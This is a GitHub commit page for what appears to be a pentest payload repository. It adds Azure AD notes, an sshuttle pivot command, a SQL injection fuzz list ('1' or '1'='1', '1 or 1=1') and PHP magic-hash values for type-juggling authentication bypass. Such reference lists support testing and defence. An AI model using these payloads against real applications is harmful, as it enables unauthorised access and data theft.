Skip to content

Commit

Permalink
Magic Hashes + SQL fuzz
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed Apr 26, 2020
1 parent 879ead1 commit 0489935
Show file tree
Hide file tree
Showing 4 changed files with 34 additions and 2 deletions.
15 changes: 14 additions & 1 deletion Methodology and Resources/Cloud - Azure Pentest.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@
* [Azure Storage Account - Access](#azure-storage-account----access)
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
* [Azure AD - Enumeration](#azure-ad---enumeration)
* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid)
* [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
Expand Down Expand Up @@ -285,6 +286,17 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online
3. Pick the account from the active sessions
4. Select Azure Active Directory and enjoy!

## Azure AD - Convert GUID to SID

The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id.

```powershell
GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
```

For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`

## Azure AD - Sign in with a service principal

https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal
Expand Down Expand Up @@ -443,4 +455,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
3 changes: 3 additions & 0 deletions Methodology and Resources/Network Pivoting Techniques.md
Original file line number Diff line number Diff line change
Expand Up @@ -151,6 +151,9 @@ pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr [email protected] 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24
# using a private key
$ sshuttle -vvr [email protected] 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
```

## chisel
Expand Down
12 changes: 12 additions & 0 deletions SQL Injection/Intruder/Generic_Fuzz.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
1
1'
1"
[1]
1`
1\
1/*'*/
1/*!1111'*/
1'||'asd'||'
1' or '1'='1
1 or 1=1
'or''='
6 changes: 5 additions & 1 deletion Type Juggling/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -42,9 +42,13 @@ var_dump(md5([])); # NULL

If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.

| Hash | “Magic” Number / String | Magic Hash | Found By |
| Hash | “Magic” Number / String | Magic Hash | Found By / Description |
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? |
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
Expand Down

0 comments on commit 0489935

Please sign in to comment.